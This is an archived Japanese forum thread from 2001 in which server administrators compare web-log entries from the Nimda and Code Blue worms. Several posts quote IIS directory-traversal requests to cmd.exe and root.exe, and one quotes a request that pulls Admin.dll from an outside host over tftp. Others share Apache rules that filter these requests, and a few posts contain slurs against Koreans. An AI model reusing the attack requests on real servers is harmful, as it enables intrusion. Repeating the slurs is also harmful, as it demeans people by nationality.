TOP カテ一覧 スレ一覧 100〜終まで 2ch元 削除依頼
【ノートン】Norton Security 250【NS】
Net Stumbler情報交換 Part2
なんで有料のアンチウィルスソフトを使うの?
◆Code Blue◆ 2000厨は逝ってよし
Linux セキュリティソフト 総合スレ
【ノートン】Norton Security 255【NS】
拡張子.aviで感染するウイルスがあるんですが・・・
彼女がトロイに感染した模様です
いまだにセキュリティソフト入れてないヤツいる?
Hotmailのパスワードの解析
◆Code Blue◆ 2000厨は逝ってよし
- 1 :01/09/19 〜 最終レス :2014/08/03
- 参照
http://www.zdnet.co.jp/help/howto/security/v08/02.html
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html
関連スレ
http://ton.2ch.sc/test/read.cgi?bbs=sec&key=997783469
- 2 :
- リターンヘッダを見るようにコードを修正しろ。
- 3 :
- Code赤がいくらか落ちついたと思ったら 今度は青だってか。
トラフィックが無茶増えて苦しいぞ、うちの回線。
- 4 :
- なんか勢い増してきたみたい・・。鬱だ
- 5 :
- ISSには
>Code Blueは対象にHTTP HEAD照会を送信し、対象からのレスポンスを検査します。
>IISがインストールされていることが分かると、Code BlueはHTTP GET要求を送信し、
って書いてあるけど、今来てるやつらはいきなりGET投げて来るから亜種だと思う。
- 6 :
- MSNがやられましたw
topを読むと送られてきます。
http://www.msn.co.jp/readme.eml
- 7 :
- ところで…てゆうか、はあ…もうカンベンしてほしいね。新鮮味もなにもないよ…
- 8 :
- 秋の新作ってトコかな (藁
- 9 :
- では、前回の反省を活かしてIPは晒しアリの方向で。
- 10 :
- /_mem_bin/..%5c../..%5c..
/_vti_bin/..%5c../..%5c..
あー、来てる来てる。こいつかあ。
- 11 :
- www4.jvnet.or.jp
↑こっからも飛んでくる。。。。。
こんなプロバイダには加入したくないものだ。。。。
- 12 :
- 参考:
http://memo.st.ryukoku.ac.jp/archive/200109.month/1197.html
- 13 :
- また祭り?
- 14 :
- 私の所には いまのところ
203.***.***.*** しかこないですよ みなさんは?
- 15 :
- 不正アクセス禁止法でKしたい!!!
- 16 :
- 202.xxx.xxx.xxx なIPに鯖があるんだが、JPドメインからどんどん来るね
- 17 :
- >>14
自分のIPがそうなんじゃないの?
- 18 :
- >>13
♪♪秋祭り♪♪
今回の奴は鯖のHTMLも書き換え、IE使ってる人にファイルをDLさせる
みたい。IEな人は MS01-020 のパッチ当てとくほうがいいね。
http://news.2ch.sc/test/read.cgi?bbs=news&key=1000822776&ls=50
- 19 :
- >>そうみたいです
なんで?
- 20 :
- 秋の新作の名は Nimda というらしい?
MSN関連スレの方が盛り上がってるね
http://www.trusecure.com/html/tspub/hypeorhot/rxalerts/tsa01024_cid177.shtml
- 21 :
- テロ〜嫌い。
まぁ祭りになりそうですね〜
- 22 :
- うちにもさっきから怒濤のように来だしたよ。(極鬱
何事かと思って色々調べてたんだけど、2chはやっぱみんな早いねぇ(感心)
恥ずかしながら最初に来たのがニイハオのIPだったんで、慌ててIP蹴ってた。
で、これがBlue?
うちもいきなりGETから入っているんですが・・・
- 23 :
- どうも、Code Blueでは無さそう。
↑にリンクしたけど、17日に報告されてる新作のNimdaと思われ
- 24 :
- Code BlueとCode Redとログはどう違うの?
最近、Zone Alarmがよけいに警告増えてきた(T_T)
- 25 :
- リンク追加:
http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html
- 26 :
- CodeRedのアクセスログがかわいく見える…。
- 27 :
- <丶`∀´>ニムダ!
- 28 :
- >>24
ログの見え方的には
初代Code Redは NNNNNNNN ってNがいっぱい
Code Red2は XXXXXXXXXX ってXいっぱい
Code Blueは ・・・・よくわからん。
>>1の ISSKKのURL見てね
- 29 :
- テロ〜嫌い。
まぁ祭りになりそうですね〜
- 30 :
- >>8 サンクス
- 31 :
- ISSの情報ではCode Blueが来たならばまずHEADメソッドの
ログがあるはずだからその辺で見分けられるでしょう。
#わたしゃApache使いなのでわからんのです
- 32 :
- コレの影響か、Code Red2が激減した。
CERTにも情報出たみたいだ。
http://www.cert.org/current/current_activity.html#port80
- 33 :
- しかし飛んでくる量が赤虫&赤虫Uの比じゃないな。
同じIPから概出の穴を舐めるように1セットで飛んでくる。
そんなとこまで舐めちゃイやん(バカ)
"GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
- 34 :
- 今度はどこの国が作ったのかね。おれはアメリカに100ペソ
- 35 :
- 2週間食料供給が途絶えれば人が餓死する
可能性が増えるようなアフガンの人がWormを作れる
わけないだろし。そもそも電気だってまともになさげ。
いくらタイムリーだからってラディンと結びつけるのは
単純だと思われ。
- 36 :
- 16:36:16 168.11.112.104 - GET /scripts/root.exe /c+dir 404 494 72 HTTP/1.0 - - -
なんてのが来た、ゲ、内側かとか思ってしまった。
- 37 :
- アタックがDNSサーバーらしきところからが多いんだけど、
DNSサーバーの穴掘られてるのかしらん。
- 38 :
- アメリカ・・・
- 39 :
- >>35
さては君誤爆だね?
- 40 :
- 昨晩10時から
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
の嵐。ほとんど韓国のIPだが、時に日本企業のもある。
何とかしてクレー。ページが重いよ。
- 41 :
- >>34
ニムダ・・・ニムダ・・・ニ・ダ・・・ニダ・・・チョンじゃねーか(w
- 42 :
- ああぁ、帯域半分食われてるよ。128Kしかないのに。
ここは、IIS無いんだから勘弁してよぉ〜。
IPが202.230.xx.xxだからなのか、キムチの国から
いっぱいいっぱいやってくる。
もうやめてぇ〜。鬱だし脳。
- 43 :
- まあキムチでも食ってマターリ逝こうよ
- 44 :
- 16回アタックで1セット?
- 45 :
- キムチ買いに逝ってきます。
- 46 :
- マータリ考えて
Apacheのな人向けのログ切り出しサンプル考えてみたです。
warmのゴミログとマトモなアクセスログと切り離せます
SetEnvIf Request_URI "default\.ida" warmlog
SetEnvIf Request_URI "cmd\.exe" warmlog
SetEnvIf Request_URI "root\.exe" warmlog
CustomLog /var/log/apache/warmlog combined env=warmlog
CustomLog /var/log/apache/accesslog combined env=!warmlog
さーて寝よ
- 47 :
- pc201.hellobox.co.jpからの攻撃が立て続けに来ている。
はっきりいってウザイ・・・
- 48 :
- >>44
ログ見てみると、どうやらそのようだね。
- 49 :
- wormね
- 50 :
- >>49
わーむだす。
- 51 :
- >>50
???
>>46のスペルが違うな〜って思っただけ
- 52 :
- はずかしー。
s/warm/worm/
- 53 :
- >>51
ノッタだけなので・・スマソ
スペル?知りません(爆
- 54 :
- ログがお祭り状態。
確かに韓国からも多いけど、com、net、eduからの訪問も。
- 55 :
- いやいや、当方半分以上は日本の企業ですぜ。
なかにはinterqもはいってるんだけど、、、
おまえISPのくせになにやってんだゴルァ
- 56 :
- INTERLINKもISPのくせに自分とこのwwwに感染。顧客を攻撃中ダヨ。
- 57 :
- さすがにもう噂になっているのね。
おれはAN-HTTPDだけど、1時間ほど放っておいて飯を食べていたら、タスクバーが
ビカビカ光っているのを見てびびってしまった。
しかし、よく来るね。
基本的にCGIの動作確認用に使っているだけなので、そろそろポート80を閉じて
しまおう。ログ見るのあきた。
- 58 :
- 理研ビニル工業株式会社だと
- 59 :
- dns1.****.co.jpやら
ns.****.co.jpとかからバンバン来る・・・
- 60 :
- 多いなあ。2時台だけで21件。
- 61 :
- 同じホストからなんども来るねえ・・・
- 62 :
- うちには2−3分ごとに8発づつくる!
- 63 :
- ウチはLINUXサーバですが
ドキュメントルートにc/winnt/system32/とフォルダをつくり
cmd.exeという名前でブラクラを置きました・・・
接続してくるサーバはリソース消費して落ちないのでしょうか
落ちてくれないと気が付かないのでしょうね・・・
- 64 :
- 落ちるのはそのブラクラに対応したブラウザで接続してきたお方でございます。
カウンタでも作りましょう。わーむちゃんのログを隔離して解析するもよし。
- 65 :
- 18/Sep/2001/22:34.21 からXXXXXXXがほとんどなくなって...
/scripts/root.exe? の類の嵐。種類はいっぱい
ダミーのroot.exeを置いてるけど。誰か探ってんのかなと思ったら
来る奴みんな探っていってるから、これがblueかな?
本格的に始まったみたい
- 66 :
- HostnameLookups Double
にしてて ほとんどIPアドレスのままなんだけど
httpd-access.logとかに
HostNameにうまく変える方法ないですか?
- 67 :
- >>56
詳細きぼん♪
- 68 :
- >>66
logresolve とかどうですか?
logresolve is a post-processing program to resolve IP-
adresses in Apache's access logfiles. To minimize impact
on your nameserver, logresolve has its very own internal
hash-table cache. This means that each IP number will only
be looked up the first time it is found in the log file.
- 69 :
- >>65
赤虫のときに、ダミー置くとIISと判断されて集中砲火を食らう、という事例があったけど、
青虫ではどうなんだろうか?
- 70 :
- >68
負荷の問題ではなくそもそも逆引きがDNS登録されていないだけだから
それでは役に立たないと思われ。。
- 71 :
- KDDIS ゴラァ
何が「KDDIの日本橋AP内に設置するため、空調・電源は万全です。」だ!!!
てめぇんとこの鯖がワームに感染してんじゃねーよ
確かにセキュリティー・ウィルス対策していますとは書いてねーけど。
管理者クビポンにしろ
http://www.kddis.ne.jp/new2/top.html
- 72 :
- Nimdaの続報 日本語版登場です
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
- 73 :
- こんな所からも来ました。
Domain Information: [ドメイン情報]
a. [ドメイン名] IISR.GR.JP
e. [そしきめい] いんたーねっとじょうほうせんりゃくけんきゅうしょ
f. [組織名] インターネット情報戦略研究所
g. [Organization] Internet Information Strategy Research Institute
k. [組織種別] 任意団体
l. [Organization Type] Group
m. [登録担当者] SA1256JP
n. [技術連絡担当者] SA1256JP
p. [ネームサーバ] ns1.iisr.gr.jp
p. [ネームサーバ] ns1.nava21.ne.jp
p. [ネームサーバ] ns3.nava21.ne.jp
y. [通知アドレス] asano@iisr.gr.jp
[状態] Connected (2002/03/31)
[登録年月日] 2000/10/03
[接続年月日] 2000/10/30
[最終更新] 2001/03/19 16:05:44 (JST)
n-nakako@nava21.co.jp
- 74 :
- ここの名前(・∀・)イイ
ニムダアタック晒し
Domain Information: [ドメイン情報]
a. [ドメイン名] KIDDYLAND.CO.JP
e. [そしきめい] かぶしきがいしゃきでいらんど
f. [組織名] 株式会社 キデイランド
g. [Organization] KIDDY LAND CO.,LTD
k. [組織種別] 株式会社
l. [Organization Type] Corporation
m. [登録担当者] SA235JP
n. [技術連絡担当者] KS1250JP
p. [ネームサーバ] ns.kiddyland.co.jp
p. [ネームサーバ] s-field1.sunfield.ne.jp
y. [通知アドレス] nsp-addr@sunfield.ne.jp
[状態] Connected (2002/03/31)
[登録年月日] 1997/12/02
[接続年月日] 1998/02/02
[最終更新] 2000/02/14 09:51:41 (JST)
nsp-addr@sunfield.ne.jp
- 75 :
- これで1セットみたいよ
- -> /c/winnt/system32/cmd.exe
- -> /d/winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
- -> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
- -> /msadc/..%5c../..%5c../..%5c/..\xc1^\../..\xc1^\../..\xc1^\../winnt/system32/cmd.exe
- -> /scripts/..\xc1^\../winnt/system32/cmd.exe
- -> /scripts/..\xc0/../winnt/system32/cmd.exe
- -> /scripts/..\xc0\xaf../winnt/system32/cmd.exe
- -> /scripts/..\xc1\x9c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%2f../winnt/system32/cmd.exe
- 76 :
- こんなニュースめっけた。
http://www.zdnet.co.jp/news/0109/12/e_codeblue.html
- 77 :
- http://www.zdnet.co.jp/broadband/0109/07/codegreen.html
bule green どれがどれ?
- 78 :
- これメチャメチャおもろい!
http://www.security.nl/misc/codered-stats/geodist.gif
- 79 :
- 俺もあまりに頭にきたのでさらします
203.141.185.132 - - [18/Sep/2001:22:27:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
Domain Information: [ドメイン情報]
a. [ドメイン名] OFFICETOKYO.CO.JP
e. [そしきめい]
f. [組織名] 東京事務所有限会社
g. [Organization] TOKYO JIMUSHO Co.,Ltd.
k. [組織種別] 有限会社
l. [Organization Type] Company
m. [登録担当者] TF198JP
n. [技術連絡担当者] TF198JP
p. [ネームサーバ] dns1.officetokyo.co.jp
p. [ネームサーバ] mars.kcom.ne.jp
y. [通知アドレス]
[状態] Connected (2002/03/31)
[登録年月日] 1997/03/28
[接続年月日] 1997/04/15
[最終更新] 1998/06/09 19:04:59 (JST)
Sunabe@kddcom.co.jp
- 80 :
- http://kanko.maizuru-bay.or.jp/
もやばいです。
おそらくNimdaでしょう。
皆さんアクセスしないようにしましょう。
- 81 :
- へ〜CodeBlueかぁ・・・と思ってウチのApacheのログ見たら
GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
ぎっしりこれで埋まってた。ようやくCodeRedが収まってきたと思ったら・・・。
ていうかこれCodeRed全盛の時よりももっとたくさんきてる気がするよ。
- 82 :
- >>63
/c/winnt/system32/cmd.exe があると4発増える
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
GET /c/Admin.dll HTTP/1.0
- 83 :
- >>82
ん?どういう意味?
- 84 :
- ここもあった。
210.91.255.164
- 85 :
- 211.185.177.1
66.125.116.35
211.196.186.105
202.62.120.21
211.186.149.122
- 86 :
- >>83
バックドアが見つかったと思ってAdmin.dllっつーのを
送り込もうとして来るみたい。
- 87 :
- なんだか一度にまとめて同一IPからぶっ放してくると思うと
その後はしばらく止んだり・・・と攻撃が散漫ですね
せめて韓国からのアクセスだけでも蹴れないもんでしょうかね、ふぅ。
- 88 :
- 誰かが書いてたけど、Nimdaアクセスしてくるやつがcmd.exeを
ゲットしようとするならその名前のやばいファイル置いといて
反撃できないのかなぁ。
- 89 :
- >>88
CRcreanみたいなやつ?
- 90 :
- >>89
それどんなの?
Google検索でヒットせず・・・。
- 91 :
- つーか、これってCodeBlue??Nimda??
混乱してきた。
- 92 :
- >>90
「ネットを舞台にした赤と緑の対決」 by ZDNet
ttp://www.zdnet.co.jp/broadband/0109/07/codegreen.html
- 93 :
- >>88
>誰かが書いてたけど、Nimdaアクセスしてくるやつがcmd.exeを
Serverサイドで実行されると思われ。自滅してどうする。
- 94 :
- >>93
サーバーがIISじゃなきゃ問題ない、とか?
- 95 :
- >>92
べりさーんくす!いまから見てきます!
>>93
仕掛けるものにもよると思うけど、とりあえずうちはLinuxだから
平気です。
- 96 :
- >>91
Nimda。
CodeBlueもCodeRedも関係ない。
同じ脆弱性もついてるけど、より悪質。
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
- 97 :
- 話題からそれるけど、こんな記事があった。
http://headlines.yahoo.co.jp/hl?a=20010919-00052271-reu-int
- 98 :
- 今度はCodeBlueが怒濤のごとくやってきます。困りました。
- 99 :
- >>46
/.jpにtypoった奴+αのが載っててたよ・・。
今更だけどAdmin.dllも含む改訂版を書いておきます。
#Admin.dllは普通だと来ないと思うけど
SetEnvIf Request_URI "default\.ida" wormlog
SetEnvIf Request_URI "cmd\.exe" wormlog
SetEnvIf Request_URI "root\.exe" wormlog
SetEnvIf Request_URI "Admin\.dll" wormlog
CustomLog /var/log/apache/warmlog combined env=wormlog
CustomLog /var/log/apache/accesslog combined env=!wormlog
- 100 :
- >>99
っていうかまたtypo。鬱だ。今度こそ
SetEnvIf Request_URI "default\.ida" wormlog
SetEnvIf Request_URI "cmd\.exe" wormlog
SetEnvIf Request_URI "root\.exe" wormlog
SetEnvIf Request_URI "Admin\.dll" wormlog
CustomLog /var/log/apache/wormlog combined env=wormlog
CustomLog /var/log/apache/accesslog combined env=!wormlog
100〜のスレッドの続きを読む
ロゴ停止(異常肖像説のヤフー)を願う
Kaspersky / カスペルスキー 総合169
Firewall,Gateway向けアンチウィルス
私は北方領土不法占拠の反日Kasperskyを支持します
「Nimda !! 」【その4】
WindowsをAdministrator権限で常用してる人
ウィルスバスターがこの先生きのこるには
【最強】ガンガンウイルス【新種】
Akamaitechnologiesって何よ?
より安心してインターネットを楽しむために
--------------------
【東名阪】エコ配 その1【260円】
■○■dBASE個人面接所
ゼノブレイド2のレックスにイライラしてきた
ドバイの旅
【芸能】松本人志、徳井義実の申告漏れ問題で吉本に苦言「闇営業の時と似てる」
サヨナラ、きりたんぽ
斎藤環のヤンキー論
ヒクソンに勝てるプロレスラー
虚言癖がある人間、最近増えてないか?もはや嘘松とかいって笑ってられないレベルで [439249206]
【学歴】格差恋愛カップル part3【収入】
坂上&指原のつぶれない店 2店目
【オアシス】☆トロピカルエヴァーガーデン★【避難所】
実質なんでも109
いじめを適切に伝えるための言葉
【東京都代表】日比谷高校vs北野高校【大阪府代表】
サル、荒川の橋渡り柴又へ…都内で目撃相次ぐ
【IT】米フェイスブックやグーグル、SNS規制に懸念 [ムヒタ★]
ミニマリストしぶ、mami、林、のが他 Part3
電子に秘められた謎
【悲報】ただエッチな格好してるという理由でJRの券売機の女性さんが晒されてしまう [855279433]
TOP カテ一覧 スレ一覧 100〜終まで 2ch元 削除依頼